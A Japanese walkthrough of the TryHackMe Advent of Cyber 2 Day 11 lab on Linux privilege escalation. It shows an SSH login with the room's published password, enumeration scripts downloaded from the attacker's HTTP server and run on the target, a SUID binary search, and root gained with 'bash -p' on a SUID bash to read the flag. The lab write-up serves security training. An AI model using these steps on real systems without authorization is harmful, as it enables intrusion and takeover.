[TryHackMe] Advent of Cyber 2, Day 11 - Walkthrough -

8771 ワード

Security KaliLinux CTF TryHackMe Security テキストリンク

本稿では、TryHackMeにて提供されている「Advent of Cyber 2」ルームに関する攻略方法（Walkthrough）について検証します。
「Advent of Cyber 2」は「free room」（無料）で提供されています。購読を必要とせずに仮想マシンを「展開（Deploy）」することができます。

『Advent of Cyber 2』のWalkthroughインデックスを「[TryHackMe] Advent of Cyber 2に参加してみた」にて公開しました。

[Day 11] Networking: The Rogue Gnome

ストーリー

これだ！--エルフ・McEagerが待ち望んでいた瞬間です。彼が「Day 8 - What's Under the Christmas Tree?」で望んだNmapコースの最終試験です。これまでの苦労が報われたようだ...。「成功！」エルフ・McEagerは叫んだ。「エクスプロイトがうまくいった！ Yippeee!」

エルフ・McEagerは、ターゲットから自身のコンピュータに対するリバースシェルの確立に成功しました。彼はほとんど知りませんでした、本当の試験はこれからなのです...。試験の最終段階では、エルフ・McEagerの権限を昇格させる必要があります。彼はNmapのチートシートの勉強に時間を費やしてきたので、今は頭が真っ白になっています...。エルフ・McEagerを助けてあげてください。

善人になるためには、まず悪人にならなければならないこともある...。（To be the good guy, sometimes you gotta be the bad guy first...）

Day 11 - #1.

What type of privilege escalation involves using a user account to execute commands as an administrator?

Horizontal な特権昇格
Vertical な特権昇格

Day 11 - #2.

What is the name of the file that contains a list of users who are a part of the sudo group?

kali@kali:~$ ls -l /etc/sudoers
-r--r----- 1 root root 669 Jul 12 11:52 /etc/sudoers

Day 11 - #3.

Use SSH to log in to the vulnerable machine like so: ssh cmnatic@MACHINE_IP

Input the following password when prompted: aoc2020

kali@kali:~$ ssh [email protected]
The authenticity of host '10.10.178.95 (10.10.178.95)' can't be established.
ECDSA key fingerprint is SHA256:Epte0uGyoBmg5Gb9zRw9f26JYUHv72UFd1VVNHcItUQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.178.95' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Dec 12 01:25:04 UTC 2020

  System load:  0.0                Processes:           92
  Usage of /:   27.8% of 14.70GB   Users logged in:     0
  Memory usage: 16%                IP address for eth0: 10.10.178.95
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

68 packages can be updated.
0 updates are security updates.


Last login: Wed Dec  9 15:49:32 2020
-bash-4.4$

Day 11 - #4.

Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.

You may find uploading some of the enumeration scripts that were used during today's task to be useful.

kali@kali:~/OffsecVM$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.10.178.95 - - [11/Dec/2020 20:37:30] "GET /LinEmu.sh HTTP/1.1" 200 -

#EndOfScript-bash-4.4$ curl http://10.11.19.198:8080/LinEmu.sh -o LinEmu.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 46630  100 46630    0     0  42390      0  0:00:01  0:00:01 --:--:-- 42390
-bash-4.4$

-bash-4.4$ chmod +x LinEmu.sh
-bash-4.4$ ./LinEmu.sh

-bash-4.4$ curl http://10.11.19.198:8080/linpeas.sh -o linpeas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  228k  100  228k    0     0   100k      0  0:00:02  0:00:02 --:--:--  100k
-bash-4.4$ chmod +x linpeas.sh
-bash-4.4$ ./linpeas.sh

-bash-4.4$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/bin/bash
/bin/ping
/snap/core/10444/bin/mount
/snap/core/10444/bin/ping
/snap/core/10444/bin/ping6
/snap/core/10444/bin/su
/snap/core/10444/bin/umount
/snap/core/10444/usr/bin/chfn
/snap/core/10444/usr/bin/chsh
/snap/core/10444/usr/bin/gpasswd
/snap/core/10444/usr/bin/newgrp
/snap/core/10444/usr/bin/passwd
/snap/core/10444/usr/bin/sudo
/snap/core/10444/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/10444/usr/lib/openssh/ssh-keysign
/snap/core/10444/usr/lib/snapd/snap-confine
/snap/core/10444/usr/sbin/pppd
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
-bash-4.4$

Day 11 - #5.

Use this executable to launch a system shell as root.

What are the contents of the file located at /root/flag.txt?

-bash-4.4$ whoami
cmnatic
-bash-4.4$ bash -p
bash-4.4# whoami
root

bash-4.4# cat /root/flag.txt
thm{2fb1{BLOCKED}6592}

参考になるTryHackMeのルーム

Shells and Privilege Escalation

Walkthrough

BRYAN WENDT, TryHackMe – Advent of Cyber 2 – Day 11 – Walkthrough
NEERANJAN MURUGAN, Advent of Cyber 2 ~ Try Hack Me

Author And Source

この問題について([TryHackMe] Advent of Cyber 2, Day 11 - Walkthrough -), 我々は、より多くの情報をここで見つけました https://qiita.com/v_avenger/items/0df365675d02a35a7603

著者帰属：元の著者の情報は、元のURLに含まれています。著作権は原作者に属する。

Content is automatically searched and collected through network algorithms . If there is a violation . Please contact us . We will adjust (correct author information ,or delete content ) as soon as possible .